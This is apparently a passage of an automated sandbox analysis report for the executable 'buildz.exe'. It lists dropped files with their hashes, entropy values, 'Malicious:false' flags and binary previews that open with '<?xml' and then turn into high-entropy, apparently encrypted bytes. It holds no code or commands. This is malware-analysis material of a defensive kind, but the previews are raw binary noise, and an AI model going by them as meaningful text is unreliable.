                        Category:dropped
                        Size (bytes):1705
                        Entropy (8bit):7.896069305436008
                        Encrypted:false
                        SSDEEP:48:gcBTjn4XrITNwfWzL3shRlUMNthrXZjN75yjTUI+75UD:xTfCWzL8hR/NPDZx56TUIW5A
                        MD5:809AE80EF8F0DA535187F01FBFDC7124
                        SHA1:972F2931E51C7A5F7A2ACC78F74289BDA04C0302
                        SHA-256:D8B4FB843A52B4066CA970AA937F7D68BBEB1735F0964B7CD39FFA707128E968
                        SHA-512:B224F63CBA8F7DFD515C3C114A43A8F8E660F95D18E3AD53E29D97EE6ECC3A49EC42E32B6456EB99F90BE3528547F1D9F40668EDB912AACB924770D935950A84
                        Malicious:false
                        Preview:<?xml..1Ws....~..]....@..,3...>z..n...Z:.Z......K.........v1.b..8(..T....3.<..@.TQ"...0.........y.-.X...<p.. ...i0w.845..v`..........2..p...t.R....d3.W.........h..[1...7..}.k.9"{{.;G.../?*.dp6..a.W...;L.C...b...j.....>.%......O..e..z.K.............N...7..F....9(.:...K.........vQ"...7.,+`.M@...`VG.opz.xA....}..O.:.h.!..f...M.9._swa...=.~MB.....?...|..Wr._...C.._~h.<..o..M.....U.x.*.K`.[K....1.......Dr......X.....O.,..Or...6.b;.i...%z.-.C.wtX..U.g.d...^....}.a0..p..Z.......pq.O..%.. .5.\V.X|..8...W@...`.P....m..6...3..Vf.b<..`....W#)..o+..V.Ka..hQ>.....&...Q. t`...hY....wL....hr=;...c.......x.R.....,..tvY^C...a......A.x..W........V.#.c*6{.....Qw.).1hU...|.`+Iq85.wS.4;..Z.v....~.Z.V..r..Kk..}............E|;..G}..-..T.....2.......%.JY.KL+.uJ..P....m...+\...L1..u....m79\..C.b~..U..G..........\.[7>.kh"2xV..S.k...A.f..s..82k.-"`.l...|Z._.h..Zc......T{._..Z.}.t.y..a3..X..G.......]..h9J........G.w,..q^w...hr........x.R......E.D.c.7!3.....M
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1742
                        Entropy (8bit):7.877167764858113
                        Encrypted:false
                        SSDEEP:48:OAqFgOeYD0h3WwIq+3u2v9sleHfYHzI/RUD:OlXuJ+Jlye/YH8ZA
                        MD5:F686D8976E73D7D01704D623C83E8915
                        SHA1:8C68F08E0F6F7D5ACDFFC8901D9FD9C6EFA7061E
                        SHA-256:0332403E199F5BFB28D4CB949865751C9539752D0B364ED736A5B32744D16304
                        SHA-512:BD547BA04D013841A4A4F389D07AB53CED676F2B1F15F4549009D702CFA1FBCC348CAD7F5DA6D5C40FB0456EDD0B852B4E903129CDCAF4F0A4B9CC58A0DF2164
                        Malicious:false
                        Preview:<?xml....Z..^..1..Fy(......XQ:..LJ.N...^5..,E.C...*z....t.=|'...0h.q"...{m....J...!..v...Ie..s..!...Br.{.XO..%U.....J{.)...W....J...m.`.......D...........DF.....Q......5.._...nYK...n.A.....<6znv.r.%....F.....\.......3.?(....;R..A5..(1..x..!-....t..X......b..U.pX+s...W+..fj/8........c.e.J..K..7:......._X.....s.A.CB.t........[3..X.pzCuque4..[@7.(..2..|...+/>ch..h.Gw.3.5.....d.;^#.r..g.......B.l^d.6\....k'L.t..$F...{.....D._.?..3...F..*|M.../.............k0...E.b...8...D.. MwQt..|_.. pn...._.N.....@b.y..Y.13fu.: .UQr-uwY5...h..p{......Ao40QK.t..#......y.z....U?..hQ..kidct....Q..%'. N%}.De.D....i.H.2]pw.92.u.Sx...&x.u.\..]..j..9..v....4...m..z...:......=-....&.u.J.A...<..B.x*P^.....<....~.P..(..1E.)...S....%..>.N.......h[0YN......6O-.9.W...U..P.oK.T..g.....+.^...`l...`......z.3...R..>$n.X..d.c+M..].....N.J.g.X.......H.....Q.<um{+.>./...;......<.hX..{.._.q...N.G..u....)v...._..\..jn5.!!.....\.fQ.6...s....D7B.Eg2j.......V.....~,C{d.#..]...3.=.2.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1695
                        Entropy (8bit):7.885762160068245
                        Encrypted:false
                        SSDEEP:48:k+SXOz/DwwJy2ddeatF/dgE4d3wAmnObPnStUD:k+S+z7dNddfT4d3RPmA
                        MD5:1D1B0D000E1DA14AD0D9A8DEDA1C1D51
                        SHA1:7A63C58AF991817DBDD23EFB700D8D2EFFF45EC4
                        SHA-256:07827AF5994EA472D415E8A59D1AD12060449A746D521A1E1CB5F7235A0B7009
                        SHA-512:3BC1587E0A8382B21EBF51D9C7F0D7598A620F9E1413E614A6A26737F2180743874B1F98411547DD3B2806062942EAB4185D0B9E0C6F8CD0C774A36134C2CBEB
                        Malicious:false
                        Preview:<?xml..a.f`....$.....`.TD.>.<r.....z.sv[....S.^..|L.......F=.C{.V.R..%^..7....[....wW.Z.z.....x....c,.'.R..V...v.I.WD......E...:.c....y.?..o.C.b.."..H..=..<....+cI$...$....f:y.t.0..8......O.N.).p.G..8.....42,zIZ.7.=.U.@.......b....b.Hc..@[7:\".*.....jj@.?.a]J4j.]..........d..`n...z..".`..5!.O...G....x'H...=....L.}..G.....1.fl.0.`.0..?XQ....EM...!.fc..?=..0'2T..kf)H..<). kdz......../R"........y.......W.....i......ia(.$....*...q_<....3..;.f.B.lU}..7.....L.UF..Jm..;....g.<Qc.........1.+..a.BC.a).....?....l.&e[Q:.'..;.H..C=.m.|...........0.t).@..i...8J. ../&.6......N..:...6....ig....?..Q.%.....:..[c..n.Ls[....&p94..!L.w..R?.k....0..>...{(.i0..R.....l.z4r.$.C.?c...N..U..(.>.....j'.S...Q.f.H..L.h.p%.8.".......2.....v.5CKf.8B.9b........z.=..P=(......p.....-.....3.2.CP.|c.D...:.&.B..t}...].9.':...Rj.ic...-..tw6......u&Z#.57...K.,..?......BA.........".[P.dl.....E,]...ng.#i..x....KwDi..rAi]...4...)...F.C./.>......f.F.`I}...2.c..q4b.9.<..K....X.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1732
                        Entropy (8bit):7.885275452918241
                        Encrypted:false
                        SSDEEP:48:TM2fakmpe7azIiVxFACVrzxAOZiHZJ2qUD:TM9k2s6PFnti5IqA
                        MD5:CF9C8BCF1CFACF2188463A31076E4656
                        SHA1:578BE4B07B133EC3411C4AA5CED9D53541940A76
                        SHA-256:269888D1B71172A18A170325BFA9A9DE41AEE7612DC768DC0988148292AC3A61
                        SHA-512:11E7ADA74F5823E660D15282BDF4472B37DA122A1D0090793DE9046FA1752197BDB8750EA1BA257C1787613D9F4949B5A60F1A8530F95CA528BFC14102246553
                        Malicious:false
                        Preview:<?xml..e... .Y..V..|DT49..N#\....M....S!...\;..^.s.v..O.vB"W........,N..._...[.....*K..|ZK-m.Gy$....#(R.".Q.....4S6he..[..9..n.....A..H.|.d1.V..((..5......."..+....<e..M..4..........&../R.~..]..3..[Z?.!..0..d..Y..H]d k.'......r"..."..5...&.......{..7..y.=Rm.t..O(....B.._.._5@...$..0....Bzx{.9. ....s...m..;.}.>..[#.z.'.....*. .!.?..N.O..c..+"..7G.. .9*B.....|.._...}g&...@I.Oa.U.0...........%.[.h.^..%7p.K..0..k....z..~H.YZ..s..l..>..H4...r.S...../.......RV!..b.CD@...~..ptv.e..<c....g...C8......-#..\._#..../...i..[KYx..~...Yd.svZ..b....l(..O+.k.}SqVKz.\.^y..A....%......%.(...qS'.m..:c..?..6'.w...h...Rz...z.......k..>0...^..z_......n..]6..(M..C.U.X]...v...6..W..R..uP...X.m..[.J....`7.U.yI.@.3....|.f.Jd..Z.@.$.P.+..}Xz.<L.A...E....K..b}(F....4.........L..h0.^.k.9........$..+.....'..V..[|k-.:~..n..TXr.NA...3Y.....A....9a.U.......5A..a2.V.16...?..d..?.._.if...tR.-#..Y..R... +.....>..t....6.Bn.3.}..+..}....'X.?;..'.:5....@Wa..X.y..Jv.u$".8.^..n2D
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1705
                        Entropy (8bit):7.880296132648785
                        Encrypted:false
                        SSDEEP:48:czVNMiUZPK3iQpfkuTs6IuDrItD/IDB7LUD:8iciwforZt/0lA
                        MD5:766525FBB621772B5751A1BAED864FCE
                        SHA1:21CAF064FFD675FA91131B3BA68CD16C2D82A0BE
                        SHA-256:2FF836A206788EF8C2803190D472DDBC757B67E83F63DCE24A8D94627EFF1AD9
                        SHA-512:C9D0C6C37B2F2CF202C8DA4128B5242EA3B866702BC870434A43C153303F4BD2944AFBFAA5630C17DC06555EC975A3E20A0469A13B57142682BFFA073267D1E9
                        Malicious:false
                        Preview:<?xml.J..*O..j..q......d.N.....0.....TU....d.@"._.........wEFf...P}._{9....8.%..gH.....@....T..=.4$X[...........A..T..U.b.....8.J...O...?........G.Q...b.....zo..8...@...x..;6.D...{-..LZ...7uw.c6..3..U.x....Y.War>.FSWy.?..J9Z,.%..Z^S...N.%|h...|g....m.. 4...xwt:..8....,/..:>p.W..XL..y.....c...B.+._h.....U.x..}.0.il.N.</......Y}6Q....e<#.;...;....nuj....J%.n4G..!..p..i.9..t2?.`+..C(.3...JXo...t/]v....\cE.J"....S.[.h....g..oA<..:F..C...k.C...x..?\.J....o&..!C.:K..P.Ak.;.S...td...3..^.ZI.."._P.....,#.Y.Z^R....@...\..W\..v.s..U-W....9.bv{..T...\b..x~..P..k>.j.dd..O.%......6.S.=j..N...'..G..@..tG..$d..T.s.N{..0...M.m...l)......._..&a...DP.AP17<K.O.....m....f."4..w...K<|.Q........3.s.8A"....r....%.{.....my{}7}:X.."....X.w..,.c..'...a>1....9.`t.Q......\.e.#.U^.{..h.+.....;..].o.3.I.B9.i.;..#.pd..>k..l=..W.k\_D.g..~S}....xC_.~......z..6....q|.X....Y..}$...I_G..3`.y.L.`....%.s..*.....Ys.....bI.`.l.d..Dr......j.C.......t7..#u.n.]$...?...c%........#K
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1742
                        Entropy (8bit):7.8867617230608476
                        Encrypted:false
                        SSDEEP:48:UG/Lips88vopNfymAgNjmFkaFlg0QUOtUD:U2s1Nfybuak/U0A
                        MD5:6D0136ADB7F7CB58BA29E25A8BE32708
                        SHA1:27D3503D461B6A7E4172E15A915D8717BAE095F1
                        SHA-256:5004AE1D788C2EABB0DF26C391E982A1A9A65C40D4E490C9103508382FEB3FD4
                        SHA-512:6B5562B6B5A9E6606D9A7B5A520AF868D3A6DFE923068DF365ED6464FE1BEEE9FF9A507444BC92361608DA54095C7670AA20606E79609D34B051BC93BDD4200E
                        Malicious:false
                        Preview:<?xml..I..V...U(.t...........P....*.g.1E^.|.......z.......o=.o..A.pw.n...r..$..B..,'.....d4DC%8%..U.U.......@....[a.c.O...z...@B~KN..K..6\d.K..K..,."t7.h.*5!?..dx....9.%.=....5P.|....0..u...j.....HGxr+.w........6.....%c.........C...(..whYy...=........t......,.U...~....2<.....k....!:..~.......f.//v...Fm...t...S...z..>g.Z.u...+...w....F...K.}.l.].3....Gf.=9...3....8..$^a.B..v.nRU...Vz...T..Uw.....y....0...Q\..E-..)._.[].[d0m.zJ.%....}..d........)......;.Z5.....v.b.j......e5}.e^......C.].E./..8.G$v.....u....$s..S.'..I.Mh)...y....q.ONm.6.......n.|.......W#....T.*.y.L.vD.`=.....bS....[V.._bG.e....$Kl...d|7...T.......c7A.Op....f&...u3I.>.t...Y..SZ.....X....X.O.....;..4.......(.....b.F..h...p5.......\...:.u.i?zE{.....'..B.)...........^$f.....3(.j..."@$.....kL..&.C.W./......>.6,.?..0"+S.B.Kx29.....qt...1;....w.L...q.b6.K!.X..j.I.J......L..&.{..y..r....Hp.......4.......8...]l.[.)G...,b.p.a.".W.4>A.z.}E..T....k........U.dZ$.D........*.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1691
                        Entropy (8bit):7.890911881070571
                        Encrypted:false
                        SSDEEP:24:+Ik0ypRbxdCXy4hmVZLghGEu6RmVxZZ1eSaeRIs9qA8i2tvR9Y/jZ9Rcjcu2QFG7:+75h7EufH1F9qcqvg/jZ9RgEQofu5UD
                        MD5:92B9CB9CE47A1CE73C61B2D571C7246E
                        SHA1:9598C16EBD2A39169375DE4B846EB2FE7647A26F
                        SHA-256:876A898700BC098EF42E4544F9CF8BC4A1572D3CF5D23E5CAEE90F79A48EA8ED
                        SHA-512:3BD6ACFB97BB36985188EC982FEB5E9D9EE98C2AFB95A2AF28DA72A1243F2B415A4FB8562408D62C3CEA6235728F8E2EE25179C7E1161F89B2258B088B3E7403
                        Malicious:false
                        Preview:<?xmlG.1.....d.Z...j.._..as....S.Ns.......k.T.......kfC.f#=}.X;qE....?...E|.E...W.."....n..Ya...#.x`..X?.Bf&1.>.?Lb%2r]0.#.2.D.....D...b......FO-Q...VWb%.a.*....5...*.!..s5Y..t.%Tqg......LzL.T.8....BT.U...X.(.A.'.$.>.0..E.loBg.F.?...o...U.....b.....j......Y.^..#....(R ud.Cf.n.ZW.$.s/.l.....(r...;.$...ydh~.&..v.pluqL...y..F...S...2...u8b_.08..'..XHN...$.3....J.W&..j|...g.^..rv..c.7..!*..J...[...^W.z.rs.....1...5.......e...o.9V..=..S.[%'...C.I..|h&Zl.-?G#o_.D].|R.....GHTA...;...9......h.f./Vs.\P..........<...p.]gS... ~.S..;.?A...=....j..[*:..w...5H.1...\.3U6...UO^.5.:.|1....?...;;x;c.....S.2.....rG...n..9.G....>..x.J.Fu..E..&`...u..b.X}.uO....U......t.P..LY.H...........X.N..6....y..x.~.+.=........Vz.9"...)...u.n...~...r......2.;...O{.Fjt....KH..a..?T(+.>y......^.y.'<$0*.R..;.l..e......]....K6_....p.D+e..v ....\).1.5w.y.8.....x.,.KJ.qr9E.J..G..;k...Ia...U......$..x.....^?...d.c.D.9..Zx...[}....."a~..Q.qD{L.q..h...}U.vV....0.."H.w.)..w.....K}8..25
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1728
                        Entropy (8bit):7.89301640406032
                        Encrypted:false
                        SSDEEP:24:wfRhmDH8qAWTgi/NhSIGOaz5Z3Fd8ZFCFRncb9d1Q+Qxzmf5Bmjqbu0RyGe+pew7:wJhmD5BSTJ1bd8ZFCyVIMBmfOnpRaUD
                        MD5:CB54327F3D55BBB8073C10631E04F2A0
                        SHA1:D693063CA45B28EE85F4F7118FA45DB14BF92D8C
                        SHA-256:91750BE43DD09DF89E20954AFF5D292B30B177535F56E322C26E79E7F0C68E82
                        SHA-512:79D2F320A836DEA7D1E6BBD384457A6C7D781944F0910F5C75DB17439878D64B27E0104259BC8EEB7A52007964D7E30266867FD4AFCFE6814A4BB637B9537A3E
                        Malicious:false
                        Preview:<?xml...).?K]..G....c.w...x....<E[.F.v..;o.C.1..:.s.'Y.q.9h.?.a....\.Rm...u.6.....^+.G....).'.pvFS.7.g....qhs`.3.../j.q#...<......L!.:.Z.....*...A..F.....y..J}cA.....qx.z.d[.....9H..K.Q.....tgi'fl3...I.<...u...6UFv.......*d-.>....z.n..m..Hz.P..h..F$..rb.%...<.....>.Z..0...r..]..=...K.\....8.?...V..8mz..`.....;G.m.:?:.....S...O...G.I;9....E.#..M..v..pS6K...F,....N.....Br.......;D.x.......z.........^V.;D}zE)......-_.fXD..T;.JA....OIG..9j.K.x....3.?..[..."....c:>.'y.Lt...p..!#=R#..6.ie}.T'.>...H.*..|M..I....D.!."..u..+$...Y..7b...B....T.dh.....V......yK..#...4...`.]gH.S..[.:........j..$...V.(..).9j.A-......:......2Q.I''......g..@.jX.h...#..4.Th....t..80...7....J.(..).]*Q?.u.A..ar..}3A.(5.G\.wu.b..*...:...H.....V-N...3:.z:..O..6.._.@...e..%.I.3#.*..JYD.G.....6R.....w.s....E..c..._b....q..6.i...N.o=;.\3.#88v..uF\.&z...c.^..}~.~7n.....e...8H.=....".!...s.ig.....|".H...K...|_U..i._.G..]s...gW..K..m../.......W<.=...VD'O>.`....PBN.....{{.:. ..4[.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1693
                        Entropy (8bit):7.894643042691641
                        Encrypted:false
                        SSDEEP:48:Y57NFwxHEgfHEww6qGpyPSpTnfEID3cHvHUD:c9gfHrMPOTnfEmcHvHA
                        MD5:9DCB558AE35F895E78EB0C042E201657
                        SHA1:623413E8AE2290A35BF7AC5066D44CE3A06A94FC
                        SHA-256:D33497B3DB9DE78488A28866A4C8B38D5BD18396DB727785BBE5A6EB64F0AE8F
                        SHA-512:A0CFC2A9EF81C9DB2E73766F2DA5B2A3D8FE435CB1E7AA68B779B5CE89715C6CB4710423098FF36EDF89607964FB05E657135ADC683F344A887C2B16A47BCFDA
                        Malicious:false
                        Preview:<?xmlRZ!...{.v.<.../=.A.{...]../e.6...F....:....[..r....s...N.mQ~,.UT.....=.<....&.x...v].,x.Ls.].)...cu..?..........nj.k..9..L....6.S....._....KF...m.....@}.....=.T.....?.Q...4..8.3o...+G.....n)...S6..3..S.b..Lb.;.I..~$...[h4....o..,..Q.d..c....V....5...F.B......0...2........i..P..........L.....hG^T.'..k..j...0.K...as2.A.E.6.v......q$.Yv9..Ld.........X$O.....R.~. %l..U.dDM.\0..a$.....vR....[.D...?.g...x.a..Fk.~.p.c..)...*.D..#..m2RV$.X69".s.jc.E.....y.!hw%..n..D.`.[..a................@@G.$...T.>....J!sf.....U....-hJK.:..:......"....o...t.:J.Ir..@......=..0.~'.9"....J........jo..%7.%.`.=.V..j.PD.....}.[+...&..LD.$$..!n.\.Z...?........\..K'....A&....{9..o.3j....O....4....`..6`m>.........iE.'d..\I...B...@.S......Uz....W..4....5|.L...e....&\....t...qW..+%ts....t..'.=/.....7.3.txw.lH(...s~......[...~...$..Q.G..3#.....>Y=3.A7........ID..^..3.;?...!g....r.E......r.I...s.h.E.8..........IaF.iM.^.\..3..'cn.K.....m...K.QG..4G.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1730
                        Entropy (8bit):7.884397244370312
                        Encrypted:false
                        SSDEEP:48:Xxx2IpQHC9ztwQ3WoYgsBDlGgxtEzqa+9mI/UD:Xxx2c9xVID/Ez3W/A
                        MD5:57AB257AD84D7AE028137B0F68D10643
                        SHA1:BC03FAB5FF07C709874D2DC4D723BD77B4B86D6D
                        SHA-256:AB683DF046A81BB743843AF1CB8FA7BFA2706DDA5D00252B072FCB0A51075CFA
                        SHA-512:FBFF68806C150F9A595CB044E29E497456AC3CA16017B2992C51F059B42C4AC864EC5531490C8A2707EF609E84838171F807839AF7C76D7E73EC30F23457EB1E
                        Malicious:false
                        Preview:<?xml...l.`.....j....).0...cr....V....X......W.C.s..8Ti...Nx..1......\..g}A..b*U..R.]..S_...2..jj.1..,d.....W....N..]..9..'.#...pQ>.tz..H.(BQ.@%..0.{.m..q...zEF...".......V.oQg[8..c..l# .f.j.<..#.....,6.t<..'m;!..e.$...y.S..;k..}>;f....:x....:....8..?......{4..%.Ke@"...Vw.4...z...N.-....e.K....Cv~m...lC.Fo...../......zqO....b7B..X.>C.P....H}..s..obzX....-.b.2.d.n#_5x_..k.u......7...f~..+.m..RH.2.b.....Y.1..[]....N..A.T.'.Y.s.8..)....}........qH..}..7...F.$...-`..f...>....LE..'..m....wl..G...C).j...9.Y...N.!NQ...o.........>J.."Vb...4.I..V.u.....\o.] ........xQ-G.dBu..1~2....O..GxZ.e73..0....T..z.... ...v....)..*.}3Q..Y.oUE..}.Z.G...\!.....{...M...B~o..Zt......}#.R..@.y....y.A[ 2.c......rCe.....O*.....Ws.8...8....F.N...'p.P...G..L........s.2.......`...@.t._.{.-...$..~}J>....n/E......JCDh.C.1v.]....B.6.....&..Ym.";_P.S-.qk.<..e.mp..6..y..Cc.\y;.}X1/..9.....'^.:PQ1..F!Vl...a%z..n..J.q>.y.#.0R... .U..[o........'..h.*.1....5./..].......=.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1711
                        Entropy (8bit):7.885710095894411
                        Encrypted:false
                        SSDEEP:24:NydRDy6n7S0CY8omOVNHWyLrpNrg+UQco1x0rsi7kDjaZ4CeQgxcG16D1x99O+K+:N967pTm6Ayf6AKs164C9ggx99O+KXJUD
                        MD5:5E75CD64F7FDFAB4476175476FA50D55
                        SHA1:2FAA1E724C39C6A4B38668C81ED8DD8F11C74510
                        SHA-256:D7401EBDD16D27A55F147D95B2228DBCE1E024EB91866A8CDEECFC2FE9214F35
                        SHA-512:81AC618FC3F74EB817CEBDA730729E8160B08C33861DA0FBC51EEA8DF353D800167F99F4720408E7DF919D48DA650204E2FA5FABEFF885401429B7AEEDF6257E
                        Malicious:false
                        Preview:<?xml.:Q$..B-...yj.X..=m.@.l..I..._K.........}.qLD..s..}.5.Vp.i.....SE.\..u....YLc...(?...\.-..X..m...>......:.m..{....&..9.....%*..~.9.*.$.ar...=..<.8.DG.8$.^.......g..,Z..S..,B..H..j......r+..x.^.....qv...p....4...E.|.M...i.?..z.\+M....{.K,..,~.}.:.#...^.c.f!.A.....'..a...j!..j.......).!Yh....3..q...O..qq.j&...^.0..H...{...p.......sP.J#j..gL....W.{...{[.Q."......}..qN..,?.....IH..@........O.{y.>.0!|N.;...&...*n..(...,..,.W..(M(+s..1P...{.kU.0r.....f"...Q...7.Q.3T..K.yS.1...v;<:..0B.}%...Ya.k;;.rf.<...L,...S.."fP.M.r...S6~XK=.8/b....|.<...~..%?..6i\..rW....m.7/..0.L.O.s<.0....'!N.d..riFiH...........'{.....9E ..R.hc.pK..A%...M.b..im..s`..5.#..i...?..6J..D?.....y....9G.T.|j.&..D..F+.I.__Z..C....+.lg8....D..{.yK5.]....".6...=.W...o...x~ht.,-W./.H.X..h.,.B...a.s..9f. .>.{....A9.............X.P......r..t.`J7.J...].U.......b8.....K.*..k.I..E#_Z..Z8b..t..6zL......S.W....[|.ZVN....V....p.1..H..C.3.Fz.;D.....lue@Gx..M.S.oPBg^..~...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1748
                        Entropy (8bit):7.8889687554119
                        Encrypted:false
                        SSDEEP:48:1MSZ+xch6PMUYl7PnmxTQAEQX2/Ez4H9KPFMz7kytUD:1MhU6kUmp12hUH00A
                        MD5:7C6BEA961FC11D53D87487EAA24437A7
                        SHA1:5B726BFE0B2B455E4B24A5E55F6108278BE0779B
                        SHA-256:EE8B2740A5AF4065437C0FA56601727636DF7482590C76382A6A674A14BE4CE1
                        SHA-512:C3136653D73A93537C06EA1E9A991BF1D715D7BED0E8A6BF8E71AC4B851A5D5286F899815400DD7F9C57FFCCBC0B7F3EA35924A248BC6A50F63D57C493B972A1
                        Malicious:false
                        Preview:<?xml@.T..8{.L..p..Vb...F.(.|x/..~#z.z.vq..K8EC0m.8.Vw.Z.=M...-..n..x.h........n../.G8.C.xwy..y....%..I..(g.IvVz.A.Y..u=V[.d...O~..:..w.....U...E.....1Y...[.tO..G...5...n..RW..<MX6...z...#.....,..9...t...aH#MC..v.......F..Z..Z&....=..b.....;.D_#J..\..Q.J....c.....8].9|].C.>...[.37(....3.9k?b....U....Im.^f.2.*.D!....`.*Vw.............e.bcaX....&.~...........)..8.....1....8.CP.E`ft.....Qe.....n..*".....|...-..,*.-..'3g.X.8HL~?......n#.afMT..{ .A..t..X...K...<.$QM...m....W0W.O..j..ID=.2L.C.'....A...C^h+-..:Qm.8.....V.......d...q.......&h..9.....J.9.....|..1%..T.p..9...>N..VJ.R..j!'.d6c...-u..,......C5-T.S!...xq'............yC.}...9U.e&..bQ.......D!.....W.'....:.{.......u|}D..F'...^..q.o..t.W..w..3R5...\.3u............P..0/(.j..3....M.......1X..I....@......l#:....$..E*....`?...Z..@.".P......, .S....e..|%.-......D......\|....7.o:...l.M....D.li...(u.....Ab.^X.Z.v...Bmw.k.S.-.y.d..);Q.dbG..x.W.V.V(...vws......0A..{.....w.&t.6.x..5./..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1733
                        Entropy (8bit):7.8808001277823045
                        Encrypted:false
                        SSDEEP:48:4HJjGJuLRwFCfjGEdRgHRmsxxNh8XsiUD:4HJGJuLRwCn3TsNh8XzA
                        MD5:CE5E065C4BC02F03D635E93CB7597664
                        SHA1:71E209401F94ADA495C34333D71D6F6F928106A6
                        SHA-256:57B7485D7AB9061986F25219F6270230F0A425CD569391F9D8F7C9717DCFCB2F
                        SHA-512:7E1405BBE60CB4BA49DBCDB4B2C64323DE612677BE96A4D0CEE873488C43838C14E4AA0F518D878FD55A3D2F02EEC42545D62A83B6009AAC76E33ED997C4AAE5
                        Malicious:false
                        Preview:<?xml..a3.8.P.Io....\(.1j........V.b..D.YY..yV.eA...I..X..6..n....HD3..1...!.#W..t..K)y....x..A/.......O..t.FFe+/.!...."...'..i.zf.HG.....p...=v.Kd$..'&.....QCc.a.Ro.Q.iT,.v_..J..E...0]..h0H.;.C...^. .6Sd'/+bpB#..y.s9'..Uy.L.9.c......*......i.h6..g...}u...E.._.3_w.\.....p.........k@7.Jf.......G.-.+1(79..h..!.l....yH...../....*$.r.......\Q..d.......D....j.0.;O.m.^H..l.t..<O|2x{.&/..p...68.D...............k.....M.....,..T.../.".c........N........Y.."..}...'|...Q.'.1B}J."..Ug.;.S.e.Y.......*j.&....(....$..Rit6zTL.1..z.[..\f....K.R.1.f.Uqp...v.....`T..^._.X.....r......."8*.J.../..p......+...6..:*]GI.s.....W......,.)CH.6.....{B.M..l....$34...u......9X..dA..c.c.&.....Z.+.,o....+.........8{..v..AF;.........Zn...T.N.......t....={........}.,!=...9.|....,.3...._..66h...z7..L)..[ .;9{p......I....._..t...g.._.....FZ..??....@K.@......i.+r...ZC6@]w..z.G.T...(......*eS..V.....j..@....ge>o.b!YF.ec|...*..m.a..$TB.GxQ.;.=B-.>.O%.gY..O....n..1.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1770
                        Entropy (8bit):7.901143282089628
                        Encrypted:false
                        SSDEEP:24:LbqJWG95Bwh1Vg8UPZ5gog7x++/BZqIsi9glB1w+nLXCoseKcjaVxsSCGbD:XqPPBSUB5gH7E+5wQAm+mCzOrCUD
                        MD5:EF13DF669DBF8FB31DA18F161097470A
                        SHA1:44DF388A27B1B2BA12CFA34E4B0C3B6732F79484
                        SHA-256:7C0C78BB790E9CC7573A831DD5EA847F722AC1313730034DE6E8FA6988B3056B
                        SHA-512:5B1A06162DAC93838E060D9E4CC7722BDFC733D00FBD3241436F0C613E30C43F3CF2A8FF502E4B21A01AE3173EA7910334867457246ECBF2323707D634650CD0
                        Malicious:false
                        Preview:<?xml.E.gC({.>.......^..Q.... ..J....7T"....b.~zH........Y........%.....-U.Cf6..../^.C.......s..Qy4..!...a...w=h..> ..`c.}0.8...D...{.n.q..C....wh.......>di...qF&.|....q..1.Ud...+.7u.+.>;.....&Y....V...1..%.i.Y...B.......0.R.....{1.o7....?c.j....J....V|.".X.......kK...3..@.x.T.;..-.u.,!..G...j.....Y$U.?.....z...u#.d.-.W1I.9.........5.ox....]9..]u._...4..7......qk..8.vp..e.k.e...~..z.@|.H7@]I.o."k..w..W..cv.%.;.q1Yz<.fQ.8K"....e......1+m...[QZ3...\.3.p/.H....C....PZ....p..3f.....C.j...d.U....V.C.P......iZ.u`..._e.P.D...OT...%..(...w.0I.....i.F|d.W_....z..K.....H......'... u.5..t...=..'...(..nVM(...b.8..`I..M.Q.i.TR...."..K.`5......t..2>.)O`.wT.+..Sr.G.............*9..A...^.....3.....,..f...,h.,.......'..09>..v.Om...e.#;'+e...W.g..w..O%w...I...&......f.6-......!.J....)S\U..1.=so(z..J..p..w.{O.....<.p..PT..^.O].D.2F-.,..0..s.2jFn..ss1.x3...1....m.rL..*...9.'p`DV>....P..=...`.).]KL....*..8[...d..r..&...'0.3.@-vR.....'...x8...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1715
                        Entropy (8bit):7.894770002013156
                        Encrypted:false
                        SSDEEP:48:KQOrUEpXhvFzDy3kE8BbqYTmQ24QagbhC0pc5TUUD:KQ+d57a0BbqO24I2wA
                        MD5:28CE9E4D24AB7A4CF42C3C5BEB3EE5FA
                        SHA1:0722B3384E6D637643DD5E0D0781702F7B1E5BF4
                        SHA-256:08D66ACA4F4949F67AD2282FC22FE0497E4D42574D1181A623837D9F97299BD5
                        SHA-512:23DEE5A8D6CF1ABB02FD3E1F6B2DCBF5CF7458AB0AF8F2843335863C30C124812529D8307490A47E4D8740F1D6F28348D7BDE64C77EE65A249A7A0A03C10A47B
                        Malicious:false
